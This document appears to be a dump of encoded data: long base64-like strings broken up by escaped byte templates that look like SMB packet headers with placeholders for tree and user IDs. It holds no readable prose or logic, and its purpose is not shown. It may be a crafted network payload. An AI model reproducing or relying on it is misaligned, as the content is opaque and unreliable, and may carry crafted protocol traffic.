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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0C\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0S\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0c\\\\x00\\\\x00\\\\x00\\\\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